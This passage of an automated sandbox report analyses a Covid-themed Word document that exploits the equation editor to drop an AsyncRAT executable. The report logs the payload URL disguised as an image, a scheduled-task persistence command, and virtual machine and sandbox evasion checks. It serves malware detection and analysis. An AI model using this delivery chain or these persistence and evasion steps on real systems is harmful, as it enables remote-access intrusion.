Source: 2Me6ei3[1].htm.2.dr	String found in binary or memory: http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg
Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Detected potential crypto function

Source: C:\Users\Public\69577.exe	Code function: 4_2_00465948	4_2_00465948
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046DD70	4_2_0046DD70
Source: C:\Users\Public\69577.exe	Code function: 4_2_004636CA	4_2_004636CA
Source: C:\Users\Public\69577.exe	Code function: 4_2_00465720	4_2_00465720
Source: C:\Users\Public\69577.exe	Code function: 4_2_00463FA9	4_2_00463FA9
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046488F	4_2_0046488F
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046408B	4_2_0046408B
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046492F	4_2_0046492F
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046412B	4_2_0046412B
Source: C:\Users\Public\69577.exe	Code function: 4_2_004649CF	4_2_004649CF
Source: C:\Users\Public\69577.exe	Code function: 4_2_004641CB	4_2_004641CB
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464A6A	4_2_00464A6A
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464268	4_2_00464268
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464B0A	4_2_00464B0A
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464308	4_2_00464308
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464BA4	4_2_00464BA4
Source: C:\Users\Public\69577.exe	Code function: 4_2_004643A8	4_2_004643A8
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464442	4_2_00464442
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464C41	4_2_00464C41
Source: C:\Users\Public\69577.exe	Code function: 4_2_004644E2	4_2_004644E2
Source: C:\Users\Public\69577.exe	Code function: 4_2_004674E8	4_2_004674E8
Source: C:\Users\Public\69577.exe	Code function: 4_2_0046457F	4_2_0046457F
Source: C:\Users\Public\69577.exe	Code function: 4_2_00464619	4_2_00464619
Source: C:\Users\Public\69577.exe	Code function: 4_2_00460EEA	4_2_00460EEA
Source: C:\Users\Public\69577.exe	Code function: 4_2_004646B9	4_2_004646B9
Source: C:\Users\Public\69577.exe	Code function: 4_2_00465710	4_2_00465710
Source: C:\Users\Public\69577.exe	Code function: 4_2_004647EF	4_2_004647EF
Source: C:\Users\Public\69577.exe	Code function: 4_2_00463FF1	4_2_00463FF1
Source: C:\Users\Public\69577.exe	Code function: 4_2_00696418	4_2_00696418
Source: C:\Users\Public\69577.exe	Code function: 4_2_006955D0	4_2_006955D0
Source: C:\Users\Public\69577.exe	Code function: 4_2_00695078	4_2_00695078
Source: C:\Users\Public\69577.exe	Code function: 7_2_00384DB8	7_2_00384DB8
Source: C:\Users\Public\69577.exe	Code function: 7_2_00385688	7_2_00385688
Source: C:\Users\Public\69577.exe	Code function: 7_2_003871F8	7_2_003871F8
Source: C:\Users\Public\69577.exe	Code function: 7_2_00384A70	7_2_00384A70

Source: 7.2.69577.exe.400000.0.unpack, Client/Settings.cs

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@8/18@3/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$adly Variants of Covid 19.doc

Jump to behavior

Source: C:\Users\Public\69577.exe

Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ................P.......................(.P.....P.......H...............Lq......................................................................

Jump to behavior

Source: C:\Users\Public\69577.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\69577.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\69577.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\69577.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: Deadly Variants of Covid 19.doc

ReversingLabs: Detection: 25%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\69577.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\69577.exe

Code function: 4_2_004683E6 push es; iretd

4_2_004683E7

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Users\Public\69577.exe	File created: C:\Users\user\AppData\Roaming\rLliXAh.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg

Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\69577.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Yara detected AsyncRAT

Source: Yara match	File source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
Source: Yara match	File source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\Public\69577.exe

WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Contains capabilities to detect virtual machines

Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0	Jump to behavior
Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\Public\69577.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\69577.exe	Window / User API: threadDelayed 8917			Jump to behavior
Source: C:\Users\Public\69577.exe	Window / User API: threadDelayed 643			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2380	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2324	Thread sleep time: -99889s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2924	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2924	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2760	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2784	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2804	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 2804	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\Public\69577.exe TID: 3020	Thread sleep count: 8917 > 30	Jump to behavior
